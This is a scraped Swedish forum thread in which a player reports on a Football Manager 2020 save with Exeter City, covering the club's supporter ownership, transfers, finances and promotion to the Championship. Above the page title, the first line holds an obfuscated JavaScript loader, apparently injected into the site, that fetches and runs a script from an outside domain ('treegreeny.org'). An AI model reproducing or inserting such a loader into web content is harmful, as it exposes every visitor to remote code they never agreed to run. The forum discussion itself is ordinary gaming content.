;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM20] Exeter City – The Trust – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Stängt] [FM20] Exeter City - The Trust

36 Inlägg
11 Users
84 Reactions
2,567 Visningar
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

Exeter City Football Club, med smeknamnet The Grecians, är en klubb från staden Exeter i sydvästra England. Exeter är en stad med ca 130 000 invånare där Exeter City är den enda professionella fotbollsklubben. Exeter spelar i League 2 och hemmaplanen är St James Park som tar in ungefär 8500 åskådare. Det låter väl inte så sexigt?

Nej det gör det ju faktiskt inte. Anledningen till att denna lilla klubb lockar mig är något som hände år 2003. I september detta år togs klubben över av Exeter City Supporters' Trust, då det fanns både ett stort missnöje bland supportrarna, men även på grund av en dålig ekonomi och fifflande bland dåvarande styrelse. Bara några år senare fälldes två gamla styrelsemedlemmar för bedrägeri. Så det hela slutade med att supportrarna köpte majoriteten av Exeter City. Klubben hade skulder på flera miljoner pund samtidigt som det inte fanns någon som kunde investera stort i föreningen. The Trust fick därför in pengar genom olika insamlingsaktiviteter och genom att supportrarna själva investerade några tusenlappar var. Men den stora räddningen kom när Exeter City lottades mot Manchester United på Old Trafford i FA-cupens tredje omgång, där Exeter fick halva kakan av biljettintäkterna samt även lite TV-pengar för returmötet på hemmaplan, då Exeter lyckades kryssa sig till ett omspel på Old Trafford. 

När dagens fotboll ser ut som den gör, där fotbollsklubbar köps upp av miljardärer av olika slag, så står några klubbar fortfarande kvar med själen i behåll. Exeter City ägs av sina supportrar, vilket jag själv tycker att alla fotbollsklubbar bör göra. Jag älskar svensk fotboll och värnar om 51%-regeln, samtidigt som jag äcklas av hur det ser ut i många stora europeiska länder där klubbar säljer ut sin själ. Och inte nog med att sådant värmer mitt hjärta, det är ju dessutom en rejäl utmaning att ta sig an på Football Manager! Detta är dessutom en klubb som aldrig någonsin tagit sig högre upp än League 1 eller vunnit en inhemsk cup - och jag älskar att vara den första managern som fyller troféskåpet. 

Denna resan skall ta mig till toppen av England och även Europa. Den största utmaningen dom första åren kommer givetvis att vara ekonomin, då det inte finns någon stark ägare som pumpar in pengar. Det kommer att ta sin tid, men det kan nog bli en fantastisk kul resa! Jag kommer att försöka använda mig så mycket som möjligt av min egen akademi, då det är en akademi som tidigare fått fram spelare som Ollie Watkins (Brentford), Matt Grimes (Swansea) och Ethan Ampadu (Chelsea). Det hade varit väldigt kul att få återförenas med dessa spelare i framtiden.  I nästa inlägg kommer jag att presentera målsättningar, truppläget samt silly season.


   
trashbag, Pontus Wernbloom, Denki and 1 people reacted
Topic Tags
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

Någon får jättegärna förklara för mig hur jag lägger upp bilderna på ett snyggare sätt, hur koden ser ut osv. Har glömt det helt. Tack på förhand.


   
Q
 Q
(@q)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 134
 
Postad av: @kenka

Någon får jättegärna förklara för mig hur jag lägger upp bilderna på ett snyggare sätt, hur koden ser ut osv. Har glömt det helt. Tack på förhand.

Klistra in bildadressen i sin helhet. Den ska alltså sluta på .jpg eller .png som exempel. Behövs inga taggar.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!


   
Kenka reacted
Denki
(@denki)
Active Member
Blev medlem: 4 år sedan
Inlägg: 12
 

Kul lagval! Kommer att följas! 

Immer nu du, VfL Wolfsburg


   
Kenka reacted
vicke231
(@vicke231)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 35
 

Utomordentligt lagval, stort lycka till!


   
Kenka reacted
OgFelipe
(@ogfelipe)
New Member
Blev medlem: 4 år sedan
Inlägg: 3
 

Härligt med Exeter! Kör själv en save med dom nu.


   
Kenka reacted
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin
Blev medlem: 4 år sedan
Inlägg: 32
 

Stort lycka till!

PW


   
Kenka reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

Varnar redan nu för ett matigt inlägg. Detta kommer inte förekomma ofta då jag hellre håller det ganska kort, men vill dela med mig av så mycket info som möjligt inför varje säsong.

Innan det är dags för en truppgenomgång så vill jag dela med mig av både bild på vår fina hemmaborg St James Park samt även presentera matchställen det kommer att spelas i. Jag brukar ofta göra min matchtröjor på egen hand och tycker att det är fantastiskt kul, samtidigt som det ger mig den där extra lilla kicken i en save. Men den denna gång har tröjorna hittats på twitter, på kontot @requestakit som jag rekommenderar varmt. 

En väldigt fin arena, med en väldigt fin ståplatssektion på kortsidan - och det hatar en ju inte. Där kommer ultrasgruppen Red Legions röja varje hemmamatch!

Våra matchställ! Vi spelar på klassiskt vis när det gäller Exeter i rödvitt på hemmaplan, riktigt läckert. I mitt tycke inget vidare snyggt tredjeställ, men bortastället är en ren njutning! 

Mål, truppgenomgång och övergångar

Mina mål
- Gå upp till League 1 [X]
- Gå upp till Championship [X]
- Gå upp till Premier League [  ]
- Vinna Premier League [  ]
- Vinna FA-cupen/ligacupen [  ]
- Vinna EL/CL [  ]

- Skapa en stabil ekonomi
- Få fram A-lagspelare från vår egna led
- Utveckla faciliteterna till toppklass.

Detta är mina mål med den här resan. Just utvecklingen av våra egna talanger från ungdomsleden är något jag brinner för, dagen när det levereras nya ungdomar till klubben är ju som en julafton för mig. Mitt FM-spelande går alltid ut på att skapa en framgångsrik klubb över sikt, där klubbens välmående går före titlar till en början. När sen klubben har stabiliserat sig spänner vi musklerna så gott vi kan för att även ta hem titlarna. 

ÖVERGÅNGAR UT

Prognosen för klubbsaldot efter säsongen såg riktigt dåligt ut då saldot förväntades sluta på minus 22 miljoner kronor (startsaldo 8 miljoner kronor). På grund av detta, samt att de tre sålda spelarna ovan satt på höga löneposter, så valde jag att sälja dem. Jag väljer också att låna ut flera ungtuppar, där lånande klubb betalar full lön. Många bäckar små.. Annars inget märkvärdigt alls som hänt här. 

ÖVERGÅNGAR IN

Här kan ni bortse från alla övergångar förutom låneavtalen, då det är dessa som jag har gjort själv. De andra var redan inför säsongen. Jag väljer att låna en mittback i Revan, en högerback i Kioso, en vänsterback i Vokins och en anfallare i Cullen. Detta ger mig både bredd och spets, framförallt i Cullen och Revan. Jag hade möjligheter till att låna in bättre spelare egentligen, men dessa fyra spelare lyckades jag låna in utan att betala ett enda öre, varken i lönebidrag eller månadsavgift! Vilket är kanon med tanke på det ekonomiska läget.

TRUPPEN

I målet har jag en stabil uppsättning, där den unge Lewis Ward kommer att stå varje minut om ingen skada sätter stopp för honom. Förhoppningsvis finns det lite utvecklingspotential där också. Maxted är en stabil andramålvakt som definitivt inte skulle göra bort sig om han fick chansen i League 2.

Backuppsättningen ser helt okej ut. Jag är lite oroad över både mittlåset och högerkanten. Mittlåset oroar mig på grund av brist på fart, men förhoppningsvis håller sig Revan hel och står för den delen. Parkes och Martin är helt okej spelare, men får det jobbigt om en anfallare har över 11 i fart.. På högerkanten är det två lån som får slåss om platsen, hoppas att dessa håller måttet. Vänstersidan ser bra ut när Vokins kom in, där även Moxey kan rotera vid behov.

På mittfältet spelar jag med en rak fyra. Här finns några guldkorn som jag hoppas mycket på. Exeterprodukterna Archie Collins och Jack Sparkes tror jag mycket på, men framförallt så sticker ju vänsterspringaren Randell Williams ut - möjligtvis en av dem bättre spelarna i ligan. Förutom dessa finns det en hel del rutin i Law, Taylor och Holmes. Jag oroar mig definitivt inte för mittfältspositonerna!

I anfallet har vi också en ganska fin uppsättning och bra bredd. Ajose, Cullen och Bowman kommer att rotera för det mesta, men jag ska försöka ge Seymour en del chanser också då han ser ut att kunna ha lite utvecklingspotential. 

Förväntad startelva
Ward
Kioso - Parkes - Revan - Vokins
Law - Taylor - Collins - Williams
Ajose - Cullen

Om ni vill ha screenshots på spelare, taktik eller annat, hojta till! Nästa rapport kommer att handla om första halvan av säsongen som snart är färdigspelad. Väl mött!


   
Denki, TommyE and OgFelipe reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  
Postad av: @ogfelipe

Härligt med Exeter! Kör själv en save med dom nu.

Kul! Hur går det för dig? Hur långt har du kommit?


   
OgFelipe
(@ogfelipe)
New Member
Blev medlem: 4 år sedan
Inlägg: 3
 
Postad av: @kenka
Postad av: @ogfelipe

Härligt med Exeter! Kör själv en save med dom nu.

Kul! Hur går det för dig? Hur långt har du kommit?

Det går bra, Är inne på fjärde säsongen, Andra i Championship. Ligger på playoff plats efter halva säsongen.


   
Kenka reacted
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
 

Kul med Exeter! Dom föll ju väldigt tungt i play-off finalen mot finfina Northampton så du får försöka ta revansch på FM. Då Brentford är "mitt lag" i England så vet man ju om att Watkins kommer från Exeter också, en spelare man verkligen gillar.

Kommer du ha någon begränsning på hur många spelare du får låna? Jag brukar själv köra max fem lån per säsong och inte två lån på samma position.


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  
Postad av: @trashbag

Kul med Exeter! Dom föll ju väldigt tungt i play-off finalen mot finfina Northampton så du får försöka ta revansch på FM. Då Brentford är "mitt lag" i England så vet man ju om att Watkins kommer från Exeter också, en spelare man verkligen gillar.

Kommer du ha någon begränsning på hur många spelare du får låna? Jag brukar själv köra max fem lån per säsong och inte två lån på samma position.

Ja dom gjorde ju tyvärr det, blir förhoppningsvis ändring på det snart här. Watkins är en riktigt fin gubbe! Sett några matcher med Brentford och som du säger är han verkligen en spelare man gillar. Drömmer ju lite om att få hem honom om några år. 

Har inte funderat på om jag ska sätta någon begränsning. Jag är överlag en motståndare till lån då jag vill utveckla och sälja mina spelare, men just nu tillåter ju inte ekonomin det. Men fem lån som jag har nu är väl en rimlig maxgräns. Har svårt att se att jag kommer att låna fler än så framöver också!


   
trashbag reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

 

Januarifönstret är över, så tänkte ge er en sen halvtidsrapport. 

Förväntningarna från styrelsen inför säsongen var att minst knipa en slutspelsplats. Media tippade oss på en åttonde plats. Efter två tredjedelar av säsongen så ligger vi väldigt bra till. Vi har lyckats att skapa oss en lucka ner till tredjeplatsen och framförallt ner till plats åtta. Ett hoppfullt utgångsläge inför sista 15 matcherna, förhoppningsvis ska vi kunna knipa en topp tre plats. 
Rolig statistik hittills är att vi gör flest mål i ligan, då vi gjort 60 mål på 31 matcher. Hela nio av dessa är gjorda på hörna, så vårt arbete med fasta situationer har fått resultat. Liam Cullen har bombat in 15 bollar och har högst snittbetyg i ligan med sitt 7.50, dessvärre bröt han nyss foten vilket innebär att han har spelat färdigt för säsongen. Så nu läggs mycket press på hans kollegor i anfallet, vilket skrämmer mig en del då bara Ajose kan få godkänt hittills av dem.
I ligacupen blev det uttåg direkt mot Bristol City med 1-3, uttåg mot Bolton i FA-cupens andra omgång med 0-1 samt uttåg i hittepåcupen Leasing Trophy i sextondelen mot Bristol Rovers.

I truppen har ingenting alls förändrats, förutom att jag skickat ytterligare några spelare som nyss fyllt 17 på lån, för att slippa löneposterna. Klubbsaldot ligger just nu på skrala 1,5 miljoner plus och vi beräknas avsluta säsongen med ca fem miljoner back på kontot. Detta är dock väldigt positivt då den första beräkningen såg värre ut, då vi enligt den skulle sluta på minus 22 miljoner. Med hjälp av att jag har lyckats låna ut nästan alla mina juniorer, sålt tre spelare samt enbart lånat in spelare gratis, så har jag lyckats att sänka månadskostnaderna en hel del. Vi har dessutom fått till ett samarbetsavtal med storklubben Arsenal, vilket förhoppningsvis kommer att ge oss lite slantar och även bra lånemöjligheter i framtiden. Något positivt som jag hittade var några trevliga vidareförsäljningsklausuler och inbetalningar från tidigare försäljningar: 

Just nu finns det stort intresse från Premier League för Ollie Watkins, som är värd 127 miljoner. Ampadu är utlånad till RB Leipzig och får tyvärr inte spela så mycket, men helt klart ett välkommet tillskott i kassan även om några säsonger. Detta är något jag kommer att försöka få med i varje försäljning, då det är fina tillskott även på lång sikt. Man vet ju hur mycket pengar som kan slängas upp för även medelmåttiga spelare. 
Nästa uppdatering kommer att komma när säsongen är färdigspelad. Om det blir ytterligare ett år i League 2 eller om det blir avancemang till League 1, det får ni se då! Kul att ni följer!


   
Fabian Andersson
(@fandersson)
Bloggare
Blev medlem: 4 år sedan
Inlägg: 8
 

Saverapport från ett lag i de lägre divisionerna i England - då fångar du mitt intresse. Kör hårt!


   
Kenka reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

 

YES! Vi tar en av direktplatserna till League 1!

Vi håller ut hela vägen och säkrar avancemang i näst sista omgången i derbyt mot Plymouth, mycket mer än så kan man inte önska sig. Efter senaste inlägget så hamnade vi i en rejäl svacka, då vi helt enkelt slutade att göra mål när Cullen gick sönder. Men vi vinner de sista 6 matcherna och tar oss upp på direktplatserna. Fantastiskt skönt då jag tror att vi hade fått det tufft i ett kval med flera skador på nyckelspelare och det hade varit riktigt tungt att missa uppflyttning när vi legat i toppen från dag ett. Har spelat med en väldigt direkt 4-4-2 uppställning hela säsongen, med fokus på snabba attacker längs kanterna. Detta blev vi lite lidande av i andra halvan av säsongen, då vi vissa matcher bara haft mellan 30-40 procent i bollinnehav och haft svårt att skapa chanser. Kändes som att motståndarna började läsa av oss lite. Förhoppningen är att kunna spela en lite mer kontrollerande fotboll nästa säsong, men vi får helt enkelt se vad för spelare vi lyckas att ta in. 

För truppsituationen är inte optimal i nuläget då flertalet kontrakt går ut. Jag hade gärna förlängt med ett par av dem rutinerade spelarna, men de vill minst tredubbla lönen vilket jag inte är okej med, hade hoppats på en minskning. I skrivande stund består truppen av tolv spelare, så nu börjar en lång och tuff silly season. Vi har en plånbok på ungefär fem miljoner kronor att trolla med, så vi får se vad jag lyckas åstadkomma. Så i nästa uppdatering blir det en rejäl presentation av truppläget med både nyförvärv och spelarförluster.


   
Kristijan, TommyE, LeoFM and 1 people reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Ett första ungdomsintag ägde rum i april och jag fick iallafall fram en spelare som har lite potential. Han har redan jagats av Brentford, med bud på 3 miljoner kronor. (Kul med just Brentford då denna klubb köpte Watkins). Jag väljer dock att hålla hårt i honom, så får vi se vad som blir av honom. Jag kommer alltid att kräva mer pengar för mina egna produkter än vad jag gör för inköpta spelare. 

Spelare IN

 

Det blev ännu tuffare än vad jag tänkte inför silly season att få ihop en slagkraftig trupp. Många spelare som jag scoutat i andra League 2 lag krävdes det alldeles för mycket pengar för, så det tog verkligen sin tid att sätta truppen. Tack vare detta så blev det en hel del lån igen, då även lånen från förra säsongen i Vokins och Revan förlängdes, men som inte syns nedan. Lånet av Ryan Johansson finns en frivillig klausul på 1 milj kronor som jag är väldigt nöjd med. Samarbetsavtalet med Arsenal ger också resultat då jag lånar in klasspelaren Gigovic helt gratis.

Dem stora pengarna spenderades på Ryan Wintle och Sam Hughes. En central mittfältare och en mittback som jag hoppas mycket på. Vi fick också in två riktigt fina spelare spelare vars kontrakt hade gått ut, dels den rutinerade mittbacken Christian Burgess från Portsmouth och den talangfulle inre anfallaren Isaac Lihadji från OM. Utöver dessa ser ni att jag har dammsugit varenda lag på de brittiska öarna och hämtat in flera newgens för småslantar. Av erfarenhet så blir ofta någon av dessa en riktigt bra spelare som jag kan tjäna pengar på framöver. Vill någon ha screenshot på spelare lägger jag upp det vid förfrågan. 

Spelare UT

Det lämnade även spelare såklart. Utöver 18 juniorspelare samt mittbackarna Aaron Hughes och Tom Parkes, vars kontrakt gick ut, lämnade dessa spelare. Jag fortsätter att låna ut mina usla juniorspelare för att slippa löneposterna. 
Nicky Ajose lämnade då han ville ha ett nytt dyrt kontrakt och i ärlighetens namn så håller han inte för att spela i League 1. 

Sammanfattningsvis är jag nöjd med transferfönstret. Det blev ett par lån för mycket i min smak, men jag hittade tyvärr inga bättre alternativ. När jag dessutom får låna in Arsenalspelarna och Tyler Smith helt gratis så gynnar det oss både ekonomiskt och sportsligt. Trots att det spenderades flera miljoner på Wintle så är jag väldigt nöjd med den värvningen, då jag av tidigare erfarenhet sett att han kan bli en riktigt bra spelare även i Championship. Sedan är jag också väldigt nöjd med alla juniorer som jag lyckats plocka in för orimligt små summor. Väldigt stora förhoppningar på ett par av dom, som ser fantastiskt intressanta ut. Dom kan ni kika på här:

Dave Leigh, köpt för 85k: https://fmshots.com/image/P3RX0
Mark Flood, köpt för 14k: https://fmshots.com/image/P3xbi

Vi går back ungefär 1,5 miljoner vilket jag självklart inte är nöjd med. Men för att hänga kvar i League 1 kände jag att jag var tvungen att spendera. Förhoppningsvis trillar det in pengar för Watkins som ihärdigt ryktas bort från Brentford för över 100 miljoner kronor, vilket skulle ge oss ett välkommet tillskott i kassan.


Jag väljer att lämna förra årets 4-4-2 uppställning och går över till att spela ett mer kontrollerat spel. Förhoppningsvis är vi skickliga nog att kunna styra många matcher. Det här är nog elvan som kommer att spela mest, beroende på form och skador såklart. 

Nästa uppdatering sker efter halva säsongen!


   
Maugzen and TommyE reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

Wow! Vilken insats vi gör. Vi slår ut West Ham i ligacupen på bortaplan, vilket också innebär att vi får in nästan fem miljoner kronor i publikintäkter.  Omgången tidigare piskade vi dit Ipswich på Portman Road med 3-0. Nu hoppas vi på ny bortamatch mot ett ännu större lag!


   
TommyE, LeoFM and OgFelipe reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Återigen blir det en uppdatering efter januarifönstret. Vet inte om ni tycker att det skulle vara kul att gå igenom läget inför transferfönstret istället? Då är heller inte lika många matcher spelade. Hojta till om ni tycker det är roligare! Hur som helst så är nu redan 33 matcher spelade av 46. Tabellen ser ut som följande: 

 

Vilken säsong vi gör hittills! Vi ligger för närvarande på en playoff plats, med fortsatt kontakt till båda direktplatserna. Vi började riktigt starkt i ligan med fem vinster på sex första matcherna, vilket chockerade mig. Resultaten på försäsongen med vår nya taktik var inte alls imponerande, men när tävlingsmatcherna drog igång så hände något med spelarna. Efter det så har det egentligen rullat på hela tiden. Vi har undvikit längre dippar, vilket jag ofta har problem med annars på FM20, och istället hittat tillbaka till vinnarspåret direkt efter nederlag. 

I ligacupen gick vi riktigt starkt, precis som jag visade i föregående inlägg där vi tryckte till West Ham på bortaplan. Vi lottades sedan mot Watford på hemmaplan och spelade fantastiskt bra, men vi rök bittert nog på straffar. I FA-cupen funkade det inte alls bra och vi får se oss besegrade av Southend i andra rundan. Ett Southend jag mötte tre dagar tidigare i ligan, där vi ställde upp med B-laget för att satsa på FA-cupen och vann med 3-0. Men tydligen så ville vår bästa elva annat tre dagar senare.. I hittepåcupen tog vi oss till kvartsfinal, där Ipswich tog revansch på oss efter nederlaget i ligacupen. Inget jag är besviken över då mina juniorer har fått spela alla matcher i denna cup. Nyttig erfarenhet och speltid hur som helst!
Det är framförallt två spelare som utmärkt sig rejält offensivt som jag vill dela med mig av. Den första är vår ytter Randell Williams.
 

Randell håller till på vänsterkanten där han har rollen YT-AT. På 43 matcher i League 2 gjorde han 5+13 med ett snittbetyg på 6.93. Williams fick efter det ett nytt kontrakt, klubbens dyraste faktiskt, men det har han gjort sig förtjänt av. För den här säsongen har Williams producerat 10+5 i ligan med ett snittbetyg på 7.16. Mycket fin spelare! Nästa spelare som har visat vägen är Isaac Lihadji, som vi plockade in från Marseille gratis.

Lihadji leder skytteligan i League 1 på elva fullträffar. Jag bara väntar på att större klubbar kommer att börja rycka i min guldgosse snart. Förhoppningsvis kan jag behålla honom ett tag till och få honom att utvecklas ytterligare.


På transfermarknaden hände det inte så mycket. Vi sålde Jack Sparkes till Sunderland för 2,35 miljoner. Tråkigt att sälja en egen produkt men han utvecklades inte alls och gjorde det heller inte bra när han väl spelare. En spelare anländer till laget, då jag för ett tag sedan hittade en väldigt lovande defensiv mittfältare i nordirländska Crusaders. Han ville tidigare inte förhandla med mig, men tillslut gick han med på att förhandla med oss och tillslut skriva på för Exeter. En värvning som gick åt på inte mindre än 4,5 miljoner sammanlagt. Men tack vare försäljningen av Sparkes samt biljettintäkterna från West Ham-matchen så väljer jag att plocka in grabben.

Vår ansvarige för ungdomsutveckling har också givit oss en förhandstitt på kommande intag i april. Mer lovande än förra årets intag, då fick vi trots allt in en spelare som jag tror en del på som jag också visat upp i tidigare inlägg. Förhoppningsvis får vi ytterligare ett par intressanta ungdomar i kommande ungdomsintag. Låter ju lovande iaf!


 


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Första säsongen i League 1 är slut och vi slutar på en tredjeplats i ligan. Vi kan ju inte vara annat än nöjda då styrelsens förväntningar inför säsongen var att vi skulle kämpa tappert för att undvika nedflyttning. Vi gör en enorm avslutning på ligaspelet där vi vinner sju raka matcher. Allt jag hade i tankarna i sista omgångarna var bara "lottas inte mot Derby, lottas inte mot Derby..". Derby med flera högklassiga spelare hade kört över mig i våra tidigare möten och var verkligen en mardrömsmotståndare. Men tack vare vår fina avslutning så ställdes vi istället mot Luton i semifinalen. 

Ett Luton som såklart inte heller är ett roligt lag att möta, då de nyligen åkt ner från Championship precis som Derby. I dessa kvalmatcher får vi klara oss utan vår bästa mittback Burgess samt guldgossen Lihadji, en mardröm helt enkelt. 

Vi börjar på bortaplan och vi gör en stabil bortamatch. Randell Williams gör ett helt magiskt 1-0 mål där han springer över nästan hela plan för att sedan smälla upp den i bortre krysset. Williams var i en helt galen form här ska sägas, han slutade på hela 15 mål i ligan efter en makalös avslutning. Luton kvitterar dock direkt efteråt och får sedan en straff. Vår målvakt Lewis kliver fram som hjälte här dock då han räddar straffen och sedan stänger igen när Luton öser på för ett segermål. Men vi håller ut och tar med oss ett bra resultat inför returen på St James.

Inför andra mötet känner jag mig ändå hoppfull då vi har visat att vi kan rå oss på de större lagen, framförallt på hemmaplan. Ynglingen Mark Flood startar återigen på högerkanten när Lihadji är borta, en position som egentligen inte riktigt passar Flood men bristen på alternativ ger mig inget val. Matchen står och väger första halvtimmen och efter 30 minuter så var avsluten 1-0 till oss. Men sedan i minut 38 skrapar vi fram en hörna. Hörnan rensas bort och landar framför Flood som står en bra bit från målet. Flood får på en riktigt rackarrökare från 30 meter och den seglar in i bortre krysset. Han kunde verkligen inte välja ett bättre läge att göra sitt första seniormål. Vi går ner på defensiven med en halvtimme kvar att spela och vi lyckas hålla ut. Målskytten blir dessvärre skadad i slutet och då har vi inga byten kvar att göra. Ett missat friläge och en ramträff är vi från en förlängning men vi har turen på vår sida även i det här mötet. VI SKA TILL WEMBLEY!

Och på Wembley så trodde jag att Derby väntade på oss, men icke. Blackpool slog överraskande ut Derby tämligen enkelt i den andra semifinalen och detta tackade jag för. Till den här matchen så var matchhjälten Flood inte tillgänglig men vi hade nu istället fått tillbaka vår stjärnspelare Lihadji. Inte i så bra matchform men helt klart värt att spela med i en match som denna. Över 50000 åskådare tog sig till Wembley för att bevittna detta drama. Spelarna taggade till som bara den i matchsnacket och vi gick ut och skapade två heta chanser redan inom de första fem minuterna. Men sedan får Ryan Wintle ett hjärnsläpp. Han drar på sig ett rött på mittplan i en helt vansinnig situation där det inte finns några som helst farligheter alls. Jag själv blir förbannad med - ska jag ryka på ett idiotiskt rött kort i en match som denna?!
Vi väljer att trumma på utan att egentligen ändra något taktiskt trots en man mindre. Vi är med bra i matchen och håller Blackpool borta från farliga målchanser. Men i den 28:e minuten så är jag inte långt ifrån att tacka för den här saven och sedan slänga bort FM för alltid. När Albin Fucking Linnér gör mål på oss så lämnar jag rummet och skriker några väl valda ord. Jag hade inte ens lagt märke till att ärkesopan spelar matchen och när han sedan ska förstöra mina drömmar om avancemang till Championship så blir det bara för mycket.

Jag lyckas dock att samla mig efter några minuter och går tillbaka till datorn för att spela av den förbannade matchen. Strax efter målet väljer Gigovic att slänga iväg ett skott likt Flood i första matchen, och även han lyckas smälla in den i nätet. Är vi med igen?! Vi går till halvtidsvila och jag manar på grabbarna att vi fan i mig kan lösa det här trots en man mindre! Spelarna käkade taggtråd så käftarna började blöda och när vi kliver ut på plan skrämmer detta livet ut motståndarna. Vi trycker på och den 59:e minuten blåser domaren straff för oss. Inlånade Tyler Smith gör inget misstag (straffen går mitt på mål när målvakten står kvar, men han fumlar in den ändå). Bara några minuter senare gör Randell Williams det igen. Han sätter dit 3-1 med ett magiskt volleyskott och nu är väl ändå segern vår tänker jag. Precis som i returen mot Luton går vi ner på defensiven. Vi skickar bort allt som närmar oss vårt straffområde och vi håller ut och vinner den här galna matchen. 

EXETER SKA FÖR FÖRSTA GÅNGEN SPELA I CHAMPIONSHIP! SÅ JÄVLA HÄRLIGT!


 


   
OgFelipe reacted
(@kristijan)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 31
 

Det blev en spännande kval final. härligt att det gick vägen.


   
Sida 1 / 2
Share: